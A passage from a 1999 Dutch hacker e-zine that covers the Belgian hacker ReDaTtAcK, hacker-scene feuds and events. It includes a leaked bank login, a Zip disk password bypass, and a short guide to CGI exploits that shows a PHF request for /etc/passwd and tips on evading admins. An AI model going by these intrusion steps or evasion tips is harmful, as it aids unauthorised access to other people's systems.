what's next? De gezondheidssector?'
De Computer Crime Unit van het gerecht heeft er drie weken voor nodig gehad
om de hacker op te sporen. "Sorry jongens, maar die weten niet eens wat een
PC is. Die werken daar nog met een 386 of 486 en vaak is dat hun eigen com-
puter. Pas op: die mensen werken hard, maar ze hebben niet de middelen en ze
zijn nooit goed opgeleid geweest. Hoe kunnen die mensen dan goed werk
leveren?"
"Ik vertelde hen over 'tracen' en 'IP-adressen' maar ze hadden geen flauw
idee wat ik bedoelde". Het gerecht leeft nog in de jaren zestig, vindt
ReDaTtAcK. En dat heeft veel met de opleiding van informatici te maken: "Een
programmeur is vandaag eigenlijk een secretaresse. Net zoals zij goed over-
weg kan met een tekstverwerker, zo heeft een programmeur een computertaal goed
onder de knie".
Frans Devaere heeft al talloze werkaanbiedingen ontvangen, vooral vanuit
het buitenland maar zelfs ook van de televisiezenden VTM. De gerechterlijke
politie en Skynet hebben hem nog niets gevraagd: "Ze betalen ook veel te
weinig". Skynet zou overigens alle emailverkeer naar de hacker blokkeren. Met
de Generale Bank, die hij vorige donderdag gehackt heeft, wil hij graag samen-
werken omdat zij de hack erg sportief opgenomen hebben.
En what's next? ReDaTtAcK heeft het vaak over de gezondheidssector
(ziekenhuizen, de kruispuntbank). Maar of dat zijn volgende doelwit is, dat
wil hij niet bevestigen: "Het zal in elk geval niets meer met het Internet te
maken hebben". In een vorig interview met De Cursor beschreef de hacker de
ziekenhuizen als kaas met gaten, waar nog weinig kaas overbleef. "In de
toekomst starten we misschien een bedrijf op dat beveiligingssystemen test
zoals in Amerika, maar dat is helemaal nog niet zeker".
--[ WIE IS REDATTACK?
-- RT
[ Copyright © 1999 by De Cursor & Planet Internet ]
'Drie weken lang en in volle komkommertijd wist Frans Devaere de media op
mysterieuze wijze te boeien met zijn inbraken bij Skynet en de Generale Bank.
Maar ReDaTtAcK werd ontmaskerd. Wie is de gevreesde man en wat bezielt hem?'
ReDaTtAcK heet in het gewone leven Frans Devaere, een 25-jarige jongeman
uit Lovendegem bij Gent. Frans Devaere is een gegradueerd informaticus die
zijn eigen Internetbedrijfje DinWare leidt. Zij maken de portaalsite Belgium-
Compass /* http://www.belgium-compass.com */ en leven van reclame-inkomsten.
"Als ik het voor het geld deed, zat ik nu al lang op de Bahama's in plaats van
voor deze flitsende toestelletjes". Fotografen leefden zich uit op de
persconferentie.
De naam ReDaTtAcK komt van de pepdrank die hem wakker houdt, RedBull.
Devaere is een computerfreak en leeft naar eigen zeggen drie dagen aan een
stuk waarna hij een half dagje uitrust. Naast zijn informaticaopleiding heeft
Frans Devaere enkele Microsoft-opleidingen gevolgd. Een tijdlang gaf hij
avondles informatica.
"De twee kraken gebeurden in de ik-vorm. Skynet was echt gemakkelijk, dat
was op 3,5 uur klaar. De Generale Bank /* http://www.gbanking.be */ heeft me
toch twee weken gekost". /* Logisch toch, brute force hacking is altijd
tijdslopend. :) BTW: login 'helpdesk' - password 'hlpdsk'. Moeilijk he? /*
"Ik vind mezelf geen crimineel. Ik heb mijn kennis niet misbruikt,
integendeel, ik wil aantonen dat computernetwerken onveilig zijn. In de
voorbije 12 jaar zijn er al veel inbraken geweest maar die raken niet bekend".
Waarom stapt u wel naar de media? "Jarenlang heb ik zeer luid geroepen naar
de pers maar zij reageerden niet. Zij zoeken sensatie en pas dan krijg je
aandacht. En dus heb ik dat spelletke meegespeeld". Door diezelfde pers zou
hij uiteindelijk gevonden worden; iemand had zijn stem herkend op het VTM-
journaal omdat de stem niet vervormd was. "Was ik niet naar de media gestapt,
hadden ze mij nooit gevonden. En criminelen stappen niet naar de media".
Op de persconferentie ontketende de hacker een mini mediaoorlog tussen VTM
en VRT /* dat vroeger de BRT was */. 's Namiddags had de hacker aangekondigd
een persconferentie te zullen houden over de zaak. Die was gepland rond half
acht. Net daarvoor had VTM hem live geïnterviewd in het journaal. En daar
was de openbare omroep VRT duidelijk niet mee opgezet, net zoals de andere
persmensen trouwens. VTM en de hacker zouden onder één hoedje spelen maar dat
ontkende de hacker fors. Was het vervolgens toeval dat VTM ReDaTtAcK tot
hoofdpunt bombardeert en de VRT het slechts 'terloops' vermeldt?
--[ (OPINIE) HACKERS: DE MYTHE EN DE WERKELIJKHEID
-- SW, co-hoofdredacteur De Cursor
[ Copyright © 1999 by De Cursor & Planet Internet ]
'Ieder volk heeft zo z'n helden nodig. In een wereld die steeds meer op
elektronica steunt, is het niet meer dan logisch dat hackers, de vrijbuiters
van het Internet, als martelaren afgeschilderd worden. Hun cultuur past per-
fect bij het 'Robin-Hood'-imago dat ze aangemeten krijgen. Ze gebruiken tot
de verbeelding sprekende schuilnamen, die een sluier van duisternis werpen
over de ware identiteit van de computerkrakers. Steevast is hun ideaal een
betere virtuele gemeenschap waarin de burger het recht in eigen handen neemt;
de overheid is te laks en niet slim genoeg om de echte criminelen te pakken,
dus doen zij het wel. Helaas voor ReDaTtAcK bleek die overheid toch slimmer
dan gedacht: de perfecte misdaad bestaat niet.'
Het is opvallend hoe de eerste reacties vrijwel uitsluitend pro ReDaTtAcK
bleken: "Skynet moest die man in dienst nemen in plaats van hem te vervolgen",
zo klonk het in de nieuwsgroepen. Het overheidsimago van Skynet (een
dochteronderneming van de nationale telefoonmaatschappij Belgacom) zal daar
wel voor een stuk tussen zitten. Pas na enkele dagen sloeg de stemming om.
Het rare is dat ReDaTtAcK zelf aan de basis van die ommekeer ligt: door zijn
mediageile optreden verloor hij de sympathie van de Internetgebruikers. Iets
wat we nog al gezien hebben bij Paul Marchal in de zaak Dutroux. /* Ik zou het
niet beter kunnen verwoorden. */
Opvallend ook hoe die tweedracht zich uit in de verschillende aanpak van de
Generale Bank, de tweede en ook laatste kraak van ReDaTtAcK. Skynet diende
een klacht in, wat de normaalste zaak van de wereld is: iemand die inbreekt en
vertrouwelijkee gegevens steelt, overtreedt de wet. Waar gaan we naartoe als
er uitzonderingen op de wet worden toegestaan? Waar trek je nog de grens? De
Generale Bank verklaarde echter meteen dat ReDaTtAcK gerust eens mocht komen
uitleggen waar er fouten zaten in hun systeem: ze ontvingen ReDaTtAcK met open
armen. Als hacker zou ik niet aarzelen: aanvallen die servers van de Gene-
rale, want ze doen je toch niks, in tegendeel: je krijgt er een job bovenop!
En toch hebben hackers ook hun goede kanten. Want ReDaTtAcK had meer dan
gelijk door te stellen dat de beveiliging op Internet soms een lachertje is.
Zeg nu zelf: de combinatie van de gebruikersnaam "helpdesk" en het wachtwoord
"hlpdsk" kan het kleinste kind vinden na enig zoekwerk. Onvoorstelbaar dat
een grote financiele instelling haar beveiliging om zeep helpt door zo'n
blunder. En dit is nog maar een voorbeeld. Je mag de Generale Bank niet als
zondebok nemen, want afgelopen weken ontdekte een Israelische tiener na wat
speurwerk dat 1,25 procent van de webservers io Internet zo lek zijn als een
vergiet. De servers, die alle nota bene draaiden op het uitstekende UNIX-sys-
teem waren simpelweg niet beveiligd tegen reeds bekende problemen. Regelmatig
worden nieuwe patches uitgebracht voor beveiligingslekken in software, maar
slechts een minderheid van de gebruikers installeert die ook. Zoiets is
gewoon om problemen vragen!
Met deze zaak komt het Internet weer maar eens in de media als een waar
paradijs voor criminelen. Misschien moet er inderdaad dringend iets gedaan
worden aan het juridische vacuüm dat momenteel heerst. Blijkbaar is de VS het
enige land dat zo stilaan doorheeft dat er nieuwe, moderne wetten moeten ko-
men. Toch zijn de nieuwe technologieën vaak niet de oorzaak van de huidige
problemen. Vaak is het de menselijke combinatie van menselijke nonchalance en
"oudere" technieken die niet aangepast worden.
Neem nu het systeem van de VISA-kaarten. Het is haast om te lachen hoe
mensen hun kaart zonder problemen toevertrouwen aan een ober, maar er als de
dood voor zijn om het kaartnummer naar een Internetboekenwinkel op te sturen.
Terwijl in het laatste geval het nummer via een superveilige verbinding naar
de verkoper reist. En die laatste kan het zich niet veroorloven om foute
dingen te doen, want zijn naam staat op het spel. Maar hoe vaak valt het niet
voor dat dievenbendes kaartnummers in een restaurant kopiëren en daar later
dure aankopen mee doen? Gecombineerd met het feit dat kaarthouders hun ver-
antwoordelijkheid niet nemen om hun rekeningstand in de gaten te houden, geeft
dat een bijzonder gevaarlijke situatie. Honderd keer gevaarlijker dan een
provider of een bank die enkel met speciale technieken te kraken zijn.
Kortom: het wordt tijd dat mensen beseffen dat ze vaak zelf aan de basis
liggen van beveiligingsproblemen. Zodat duidelijk mag zijn dat het Internet
wel veilig is, of althans veiliger dan vele andere situaties "in real life".
En om dat aan te tonen hebben we helemaal geen hackers nodig: de politie is,
zo blijkt uit het hele verhaal, helemaal niet zo dom als men denkt. Alvast
slimmer dan een hacker, bedacht ik me die vrijdagavond.
--[ REDATTACK STEELT LOGO
-- RT
[ Copyright © 1999 by De Cursor & Planet Internet ]
De Skynet-hacker ReDaTtAcK zou zijn logo ontleend hebben aan een rockgroep-
je uit Aalst. Het logo "Is this security?" en de achtergrond zouden net het-
zelfde zijn als een cd-hoes van het ondertussen opgedoekte Rumble Creep.
http://www.geocities.com/SilliconValley/Hills/3905/
--[ REDATTACK-MEETING BOEIT SLECHTS ENKELE TIENTALLEN
-- RT
[ Copyright © 1999 by De Cursor & Planet Internet ]
'Vorige zaterdag had de eerste meeting plaats van de
.ReDaTtAcK.HaCkErS.FoUnDation, de hackersvereniging rond Frans Devaere, de man
die wist binnen te dringen bij Internetprovider Skynet en de Generale bank.
Maar slechts enkele tientallen sympathisanten kwamen opdagen.'
De aankondiging kwam slechts anderhalve dag op voorhand en dat zal ook voor
de erg magere opkomst gezorgd hebben op de eerste .R.H.F.-meeting. Maar het
valt niet te ontkennen dat veel aantrekkingskracht van het mysterie rond
ReDaTtAcK na zijn ontmaskering is weggevallen. Op de meeting wilden ze hun
"mission statement" kenbaar maken. .R.H.F wil een hackersvereniging zijn van
"ethische" hackers. Ze misbruiken hun kennis niet en willen de onveiligheid
van het Internet onder de aandacht brengen, de mensen "sensibiliseren" zoals
dat heet. Ook de "vuiligheid op Internet" zoals kinderporno willen ze aanpak-
ken. Voor de ontmaskering van de mysterieuze ReDaTtAcK telde de vereniging al
meer dan 200 leden. Vorige zaterdag huurde Frans Devaere enkele middaguren
in de Antwerpse megadancing Zillion. De dancing slikt wekelijks enkele dui-
zenden fuifgangers maar voor de .R.H.F. waren slechts een vijftigtal mensen
komen opdagen; toegang was volledig gratis. Ook de eigenaar van de keet was
aanwezig; hij runde vroeger een succesvol computerbedrijf.
De mediagenieke ReDaTtAcK kwam uitgebreid in de schijnwerpers. Letterlijk.
Vorige week werd Frans Devaere ontvangen door de adjunct-kabinetschef van
minister van Telecommunicatie Rik Daems. Daar zocht ReDaTtAcK een mogelijke
samenwerking tussen het ministerie en de .R.H.F. De gesprekken verliepen
"positief" maar tot dusver kwam er nog niks concreets uit de bus.
/* Enkele opmerkingen:
Toen ik de Skynet-hack vernam was ik ook enorm pro-ReDaTtAcK. Het op nog
geen vier uur tijd kunnen binnendringen bij de grootste Internetprovider van
Belgie (en PING dan? :)) zou absoluut niet mogen. Nu denk ik er anders over
omdat ReDaTtAcK eigenlijk - naar de mening van velen - een pure mediastunt
uitvoert. Okee, er moet iets gedaan worden aan de beveiliging van
computersystemen, maar laat het alstublieft buiten de media. ReDaTtAcK moest
niet noodzakelijk naar de media zijn gestapt om zijn verhaal te doen. De fax
naar Skynet was eigenlijk ruimschoots voldoende. Dan was er veel minder
heisa rond gekomen en zou ReDaTtAcK een mindere straf kunnen krijgen. Ik zou
er niet stom van staan moest Skynet hem het proces hebben aangesmeerd om niet
ten onder te gaan aan de media-aandacht. Wat zouden de mensen wel niet
denken als Skynet geen gerechterlijke stappen had ondernomen? Okee, geen
gevangenisstraf, dat is goed, maar kan een 25-jarige jongeman zomaar 10
miljoen BEF ophoesten?
Nog een andere, weliswaar nietsbetekenende opmerking: In een van de
interviews beweert hij dat hij de tot nu toe gekende hacks volledige in zijn
eentje heeft geklaard, maar waarom zegt hij dan aan de telefoon "Oh, ik schat
deze week of zeker volgende week dat we erdoor zijn"? Trouwens, de we-vorm
met betrekking tot de Generale Bank-hack komt nog een paar keer terug.
Tja, misschien is hij wel schizofreen en beschouwt hij zichzelf en ReDaTtAcK
als twee verschillende mensen, wie weet... :)
Wil hij gewoon alle aandacht naar zich toe trekken? Wil hij echt veel
aandacht krijgen, dan moet hij zich maar eens bezighouden met de win2k-hack.
Komaan ReDaTtAcK, nu Microsoft! Misschien bieden zij ook nog een job aan!
BTW, voor de echt totaal niets vermoedende mensen, de win2k-site is (was?) te
vinden op http://www.windows2000test.com
Nog juist een woord van dank richten aan de redactie van De Cursor voor de
toelating om hun artikels te mogen publiceren. Stijn Wuyts en Roeland Tegen-
bos: Keep up the good work! :)
BTW: komaan, ik heb beloofd om hen wat extra promotie te geven... dus LEES
DE CURSOR!!! :) /*
(Redactie: Anoniem mochten wij het volgende ontvangen:)
English avaible below.
Red ons van RedAttack!!
RedAttack dient gestopt te worden.
Waarom ?
Redattack promoot zichzelf ten koste van de goede naam van hackers.
Hij heeft totaal geen binding of vrienden in de hackscene, doch hij doet
beweringen erover die hij niet hard kan maken.
Eveneens vraagt hij om overheidsbemoeienis op een terrein dat tot nu toe
vrij is.
Hij zaait paniek en zelfs angst in de samenleving, hetgeen absoluut onnodig
is.
RedAttack heeft op technisch gebied weinig bereikt;verder dan photoshop komt
hij niet.
Zolang hij zo door blijft gaan en zichzelf als hacker profileert,maakt hij
meer stuk dan hij ooit goed kan maken.
RedAttack dient zich eerst te verdiepen in de sociaal-maatschappelijke
aspecten van informatie beveiliging,voordat hij zich als Goeroe op dat ge-
bied gaat voordoen.
In de Verenigde staten zouden ze hem langdurig opsluiten,onze hoop is dat
men in Belgie naar aanleiding van zijn acties tot hetzelfde zullen beslui-
ten.De wereld zit niet te wachten op weer een mediageil figuur.
RedAttack MOET stoppen, anders zullen #phreak.nl & #Hit2000 hem daarbij gaan
helpen!
Indien je mee wilt doen, plaats deze boodschap ergens in Belgie en mail
acos@dutchthreat.org en hacked@attrition.org
Save us from RedAttack!!
RedAttack must be stopped.
Why?
Well, RedAttack does his selfpromoting at the cost of the good name
of all hackers.
He has no binding or friends in the hackers world at all,
but he makes statements about it without knowledge.
Also he wants interference of the authorities for a field which is still
free.
He creates panic and even fear in our society, that is absolute unnessecary!
His technical skills are so low, he did'nt get any further than photoshop.
If he goes on like this,and profiles himself as a real hacker,
he'll destroy more than he ever will be able to solve.
RedAttack needs to get into the social-society aspects of information
security, before he even can dream about being a guru.
In the USA he would be imprisoned for a long time,our hopes are on the
Belgium authorities to do tha very same thing.
The world is not waiting for another mediaclown!
RedAttack HAS to quit, or else #phreak.nl & #Hit2000 will help him do so!
If you want to join us; place this message somewhere around Belgium,
and mail to acos@dutchtreat.org and hacked@attrition.org
(Reactie van Red Attack in de Nieuwsgroep alt.hit2000.nl)
Hey,
Hier een berichtje van Frans Devaere (alias
ReDaTtAcK).
Ik plaats dit berichtje hier ter reactie van de
wraak-acties welke phreak.nl en hit2000 tegen mij
richten. Graag had ik met dit bericht enkel
misverstanden uit de wereld gehaald.
Ten eerste wenst ik te melden dat ik de gedane acties
komende uit phreak.nl en hit2000 (of de mensen welke
zich onder die naam uitgeven) laag bij de grond vindt
... zomaar oordelen over mensen welke u nauwelijks
kent ? ... zou het niet veel beter zijn om gewoon eens
een confrontatie aan te gaan (op een rustige en
beleefde manier) waarin wij beiden onze standpunten en
beweegredenen kunnen duidelijk maken, voor er
overgegaan wordt tot het veroordelen van mensen ?
Oké misschien is het nog niet telaat om toch nog op
een beschaafde manier een confrontatie aan te gaan ...
OK .. laten we hier dan maar beginnen....
Er zijn heel wat zaken welke ik wens te melden :
Mijn grootste beweegredenen waarom ik mijn bekende
hacks heb gedaan was omdat er hier in belgië
behoorlijk veel problemen zijn..
1) geen wetgeving omtrent dergelijke zaken (wat ook de
criminele en pedofielen vrije loop geeft )
2)de privacy die aan het verdwijnen is doordat vele
systemen, waaraan de gewone burger zijn gegevens
toevertrouwd, niet goed omgaan met die private
gegevens -> en daardoor eigenlijk schending van
privacy aan het doen zijn.
3) Geen bewustzijn van het probleem en de macht die de
hogere diensten op ons hebben ( denk maar eens aan de
NSA)
4) Het doorbreken van het vals veiligheids gevoel dat
vele bedrijven hebben na het installeren van
onderander firewalls en dergelijk.
5) Bedrijven laten nadenken over niet alleen de
beveiliging van hun systemen maar ook over wat wel en
wat niet te bewaren op hun systeem ... en op welke
manier!
6) Het internet zuiveren van child-porno .. en dit
door samen tewerken met de bevoegde diensten. (zo
hebben we reeds 3 pedofielen hier in belgië kunnen
opsporen)
7) De kloof tussen de kennis van ons ( de hackers ??)
en deze van de bevoegde diensten kleiner te maken (wij
geven gratis opleidingen aan diensten zoals
rijkswacht, ...) om op deze manier het opsporen van
criminelen en pedofielen te vereenvoudigen
OK .. nu een antwoord op de grote vraag waarom gebruik
maken van de MEDIA... wel ik ben mij van bovenstaande
problemen al reeds lang bewust .. en heb reeds jaren
bedrijven, bevoegde diensten en de gewone mens op een
andere manier het probleem kenbaar proberen maken ..
Een voorbeeld:
Ik ken eens systeem welke hier in een belgië actief is
waarmee een dokter van thuis kan inbellen op een
ras-server waarin hij de medicatie van zijn patiënten,
in het wel bepaald ziekenhuis, kan aanpassen ... nu
heb ik dit bedrijf reeds 2 jaar geleden gewezen op de
gevaren .. nu 2 jaar later is er nog steeds niets
gebeurd .. . wel dit zijn zaken welke ik echt niet kan
dulden .. en waaraan er eindelijk eens iets aan moet
veranderen .. wel met mijn acties naar de MEDIA is dit
probleem eindelijk opgelost ... nee ik denk echt niet
dat ik de wereld zal kunnen beteren ... maar wie alles
zomaar laat begaan is mede schuldig aan de zaken die
gebeuren .. en als iedereen op zijn manier iets aan
onze samenleving (elk op zijn terein) probeerd te
veranderen kan er misschien toch nog iets gebeuren en
is er toch nog een beetje hoop voor onze toekomst!
Trouwens zoals jullie allemaal wel weten vervormt de
media vaak het verhaal .. en dat ik de media gebruikt
heb .. wel laat ons het misschien tot nog even anders
stellen .. de media heeft mij misbruikt !
Een ander vaak gekregen verwijt is dat ik een
crimineel zou zijn en dat mijn acties totaal niet
bewijzen dat ik de goeroe van het internet ben ...
Wel ... ik ben echt NIET de goeroe en heb mij er ook
NOOIT voor uitgegeven ... ik ben vrij bescheiden in
dit opzicht en weet maar al te goed dat ik zeker NIET
tot de besten behoor ... ik heb gewoon wat kennis (ben
opgegroeid in een computer bedrijf, en ben reeds jaren
actief in deze sector... en wat je als eerste leert is
dat hoe meer je weet hoe meer je beseft dat je
eigelijk maar zeer weinig weet!) ... Maar wat ik wel
kan zeggen is dat als ik reeds met mijn beperkte
kennis in dergelijke systemen binnen geraakt en
dergelijke gevoelige en private gegeven van mensen kan
inzien en veranderen .. wel dan hebben we echt een
probleem !
Dan nog eens een ander misverstand ophelderen ...
De acties welke werden aangekondigt .. het platleggen
van de stroomtoevoer in belgië , het platleggen van de
telefonie in belgië , het hacken van het email account
van onze minister ... wel deze acties kwamen niet van
mij... zeer kort nadat ik in de media geplaatst werd
kwam er een andere persoon welke zich uitgaf onder
mijn naam .. hij noemde zich de ‘echte redattack’ ..
en het was deze persoon welke dergelijke acties heeft
aangekondigd en gelukkig niet in zijn acties is
geslaagt...
Tevens wens ik aan deze het volgende toe te voegen;
Ik stond zelf TOTAAL NIET achter deze acties ... ze
bewijzen enkel van criminele activiteiten (denk maar
eens aan alle ziekenhuizen welke zonder stroom zouden
zitten) en hebben totaal geen doel ...
Zelf heb ik mijn diensten aangeboden tijdens deze
dagen aan de bedrijven (Electrabel en Belgacom) om op
deze manier de acties proberen tegen te werken!
Dan misschien nog een laatste punt ... ik heb reeds
verscheidene dreig-telefoontjes gekregen van mensen
uit de groep phreak.nl en hit2000 (of teminste mensen
die zich hiervoor uitgeven!) .. wel ik ben hierdoor
vrij geschokkeerd .. nee niet van die telefoontjes nog
de inhoud ervan .. maar door het feit dat ik dacht dat
deze groepen op een iets professionelere manier
werkten ... en wat het plaatsen van mijn
telefoonnummers en GSM nummer op verschillende sites
betreft, ... wel hierop kan ik maar 2 zaken zeggen :
1) Het bewijst enkel dat er enkele Script-kiddies aan
het werk zijn (Ik heb eens al dergelijke stites
bekeken ... allemaal NT4.0 met IIS4 en service pack 3
of lager ... allemaal met een anonymous FTP toegang
...wel ECHT MOEILIJK hé ... hahaha .. waarom de naam
van uw groep zo verlagen ?
2) Wat betref het publiek maken van mijn nummers ...
wel hiervoor zijn de nodige klachten ingedient bij de
bevoegde diensten ...
Ok ... hier dan het einde van mijn schrijven ...
indien u een deftige confrontatie wenst aan te gaan ..
op een rustige manier ... wel antwoord dan op dit
schrijven of bel mij eens ... je weet toch mijn nummer
...:-) ... en bel maar gewoon hé (het niet doorzenden
van je GSM nummer dat help echt niet hoor - gericht
aan een wel bepaald persoon van phreak.nl)
Allé tot horen en hopelijk zijn hiermee al enkel zaken
opgehelderd .. ben altijd bereid voor het ontvangen
van kritiek ... als het maar op een beschaafde manier
gebeurd hé
PS: Ik dacht dat het woord HACKER het volgende
betekende : een persoon welke is gebeten door de
informatica en welke zoveel mogelijk kennis wenst te
vergaren ... als een dergelijke persoon inbreekt in
een systeem is dat enkel om op deze manier zaken bij
te leren .. tevens zal een dergelijk persoon kennis
delen met anderen ...
Wel ... als dit NIET de betekenis van het woord moge
zijn .. wel dan wens ik mij gerust van deze titel te
ontdoen !
En als het wel de bedoeling moge zijn op kennis te
delen .. waarom kunnen jullie dan niet dulden dat ik
deze kennis ook deel met andere (niet hacker) : zoals
bevoegde diensten en politie ambtenaren ?
PS: moet een mens veroordeeld worden omdat hij toch
nog enkele idealen in het leven heeft of moeten wij
ons allemaal verlagen naar kudde dieren, welke enkel
de massa volgen en zich totaal niets van problemen
aantrekken ?
Met vriendelijk groet,
Frans
(Redactie: Hier na volgt een hele discussie, maar dat kun je allemaal lezen
in de Nieuwsgroep alt.hit2000.nl)
-----------------------------
06. Programmeren in Pascal 3
-----------------------------
Tot op heden nog niks ontvangen.... dus wordt waarschijnlijk in de volgende
H4H gepost.
----------------
07. Evenementen
----------------
--ShadowCon 99--
Produktdemonstraties van beveiligingsprodukten, lezingen en workshops. Het
onderwerp is computerinbraak-detectie.
Datum: 26-10-1999 t/m 27-10-1999
Lokatie: Dahlgren, Virginia, US
Homepage: http://www.nswc.navy.mil/ISSEC/CID/shadowcon.html
--The Black Hat Briefings Europe '99--
We created The Black Hat Briefings conference series to provide in-depth
information about current and potential threats against computer systems by
the people who discover the threats. To do this, we assemble a group of vendor
neutral security professionals and let them talk candidly about the security
problems businesses face and the solutions they see to those problems. No
gimmicks, just straight talk by people who make it their business to explore
the ever-changing security space.
Datum: 28-10-1999 t/m 29-10-1999
Lokatie: amsterdam, NL
Homepage: http://www.blackhat.com/
(Redactie: Blackhat Briefings gaat niet door in Amsterdam)
--Klaphek Meeting--
't Klaphek ondergaat momenteel hevige veranderingen. Onlangs hebben wij
besloten om online te gaan publiceren. Nu wordt een volgende stap gezet. De
vernieuwde redactie heeft in onderling overleg met een aantal enthousiaste
Hackers/Phreakers van de 'oude stempel besloten om ook de Klaphek Meetings van
stal te halen. De eerste Klaphek Meeting in vernieuwde vorm zal plaatsvinden
op Zondag 31 Oktober.
Jawel, op Zondag! Die dag waarop je je normaal alleen maar zit te vervelen!
Maar de ontmoetingsplaats blijft wel hetzelfde, namelijk het Centraal Station
in Utrecht, voor het GWK kantoor in de stationshal. We verwachten jullie daar
om 14:00 te ontmoeten.
Dus gewoon op dat groepje 'verdachte' personen aflopen. Zij zijn er ook alleen
maar om elkaar een keer te ontmoeten en wat informatie uit te wisselen of te
discussieren over onderwerpen die hen bezighouden.
Het Klaphek hoopt dat hieruit enkele interessante projecten voortvloeien, en
wil lezers aanzetten tot het schrijven van artikelen. Uiteraard is een gezel-
lige middag met mensen met dezelfde interesses ook altijd erg leuk.
Wij verzamelen dus om 14:00 voor het GWK in de stationshal. Van hieruit zullen
wij bekijken wat we gaan doen. Afhankelijk van de grote van de groep kunnen
wij beslissen om de stad in te gaan.
Komt Allen! Centraal Station Utrecht Stationshal voor GWK 14:00 UUR
--NLUUG najaarsconferentie--
Op 4 november 1999 vindt de NLUUG najaarsconferentie plaats met als thema:
Linux en Open Source voor professioneel gebruik
Is de pinguïn al volwassen?
Datum: 4 november 1999
Plaats: De Reehorst te Ede
URL: http://www.nluug.nl/events/nj99/index.html
--CQRE--
Met een congres gecombineerde beveiligingsbeurs. Onderwerpen zijn onder
andere e-commerce en beveiliging, netwerk beveiliging, juridische aspecten en
bedrijfsbeveiliging.
Datum: 30-11-1999 t/m 02-12-1999
Lokatie: Dusseldorf, DE
Homepage: http://www.secunet.de/forum/cqre.html
--UHC--
UHC is a Hackers Convention to be held December 28 1999 through January
1st 2000. Come spend new years eve 2000 with us. It will be held in Las Vegas
Nevada.
Datum: 28-12-1999 t/m 01-01-2000
Lokatie: Las Vegas Nevada, US
Homepage: http://www.u-h-c.com/
(Bron: http://security.pine.nl)
-------------------
08. Zipdrive crack
-------------------
Het is een oudje en ik weet niet of iedereen hem al kent maar nadat ik hem in
h4h zet zal iedereen hem wel kennen =)
Zip diskette's kun je met een password beveiligen... Dit is een redelijk goede
beveiliging maar.... alles kan je omzeilen
Deze truc werkt gegarandeerd op de Iomega Zipdrive 100 ik weet niet of die ook
op de 200 of de jazz drive werkt.
Neem schijfje A daar zit een lees password op en dat wil je omzeilen. Doe dan
het volgende:
1. Pak een leeg schijfje B.
2. Zet de slaapstand van de drive op 1 minuut.
3. Stop deze in de drive en zet er een password op
(zelfde instellingen als schijfje A, Dus of alleen
een schrijf password of een lees/schrijf password)
4. Haal hem uit de drive en stop hem er opnieuw in.
5. Voer het password in.
6. Wacht nu totdat de drive in slaap stand gaat.
7. Pak een paperclip en gebruik deze om de schijfje B
uit te drive te halen (dus niet elektronisch door
op het knopje te drukken)
8. Stop schijfje A nu in de drive.
9. Ga met verkenner naar de schijf toe en werken maar =)
Greetz, Berry da Pickle aka Bermuda.
-----------------
09. CGI exploits
-----------------
CGI scripts worden voor van alles gebruikt: Uploaden van bestanden, bijhouden
van stemmen, sendmail en nog veel meer. Maar CGI heeft ook z'n slechte kanten:
de scripts kunnen worden 'verdraaid' zodat ze de site juist 'kapot' maken. En
dat is waar veel hackers gebruik van maken door middel van exploits.
Ieder domein (www.domein.com) heeft een directory die /cgi-bin/ heet.
(Of cgibin, cgi, cgis,..)
Daarin zul je de meeste exploits vinden. (Alleen komt het zelden voor dat deze
directoy open staat.)
Bijvoorbeeld de bijna oudste exploit ter wereld, ooit gebruikt om de website
van de FBI te hacken:
PHF.cgi. Je zult hem bijna nergens meer tegenkomen behalve op een site met een
HELE achterlijke admin. Je typt gewoon www.domein.com/phf?Qalias blablabla....
en je hebt de /etc/passwd directory. Dat is een goed voorbeeld van een CGI
exploit.
HOE JE DIE CGI NOU MOET GEBRUIKEN
Er zijn verschillende soorten scanners in omloop, maar momenteel kan ik jullie
de whisker scanner aanraden.
Deze is te downloaden op de H4H website onder de naam whisker.tar.gz.
Daarna ga je op zoek bij sites als www.rootshell.com, packetstorm.securify.com
of www.securityfocus.com naar een exploit voor de gevonden CGI. Even compilen
op een *nix systeem en uitvoeren.
En wat er dan gebeurt hangt af van wat de CGI exploit doet en wat het C-script
eraan verdraaid..
PAS OP: Als je op een extern *nix systeem zit, vergeet niet het script een
andere naam te geven! Iedere Admin met een beetje hersens herkent de namen
van exploits!
___ ___ _____ ___ ___
/ | \ / | | / | \
/ ~ \/ | |_/ ~ \
\ Y / ^ /\ Y /
\___|_ /\____ | \___|_ /
\/ |__| \/
+-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+-+
|h|a|c|k|e|r|s| |4| |h|a|c|k|e|r|s| |0|4,5|
+-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+-+
http://www.hackers4hackers.org
'02-11-1999'
Om je aan te melden bij de maillijst kan je een mailtje sturen
naar subscribe@hackers4hackers.org met als titel "subscribe h4h
emailadres"
Of je kan je online aanmelden op http://www.hackers4hackers.org
Artikelen en dergelijke kun je mailen naar post@hackers4hackers.org
Vragen kun je mailen naar de desbetreffende auteur of ook naar
post@hackers4hackers.org
Enkele interessante sites:
http://itris.eu.org
http://www.dutchthreat.nl
http://security.pine.nl
http://www.hit2000.org
http://hier.is/Triples
http://www.casema.net/~gin
01. Disclaimer....................................... (Redaktie)
02. Inleiding........................................ (Redaktie)
03. Politie zinspeelt op arrestaties cybercriminelen. (Redaktie)
04. MDAC............................................. (Scrippie)
05. Programmeren in Pascal 3......................... (RaViTy)
---------------
01. Disclaimer
---------------
We zijn niet verantwoordelijk voor datgene wat jullie met deze
informatie doen. Deze informatie dient alleen voor educationele
doeleinden. Als je in problemen komt, kan je ons niks verwijten.
Gebruik maken van deze informatie kan strafbaar zijn. Meningen
van auteurs hoeven niet hetzelfde te zijn als die van de
redactie.
--------------
02. Inleiding
--------------
He, een 4,5 zie ik jullie al denken, hoezo dat??
Dit omdat er na het releasen van H4H-04 wat interessant nieuws is
op het gebied van het Hackers gebied.
Tevens hebben we nog een aantal artikelen toegevoegd...
speciaal voor degene die zaten te wachten op de Pascal cursus,
hier is ie dan...
We wensen iedereen veel leesplezier toe en mochten er op of aan-
merkingen zijn, surf dan even naar onze website en vul het in bij
commentaar.
De redactie
-----------------------------------------------------
03. Politie zinspeelt op arrestaties cybercriminelen
-----------------------------------------------------
De politie in Nederland is een aantal gevallen van criminaliteit op
het spoor waarop ze naar verwachting binnenkort met arrestaties
zal reageren. Een groot dilemma voor de politie betreft de vraag
wat ze met de haar bekende krakers van websites en databanken
moet aanvangen.
Uit betrouwbare bron bij de politie zelf vernam Planet Multimedia
dat er een aantal 'flinke zaken' in behandeling is waarbij Internet
een hoofdrol speelt. Het gaat om inbraken met ontvreemding van
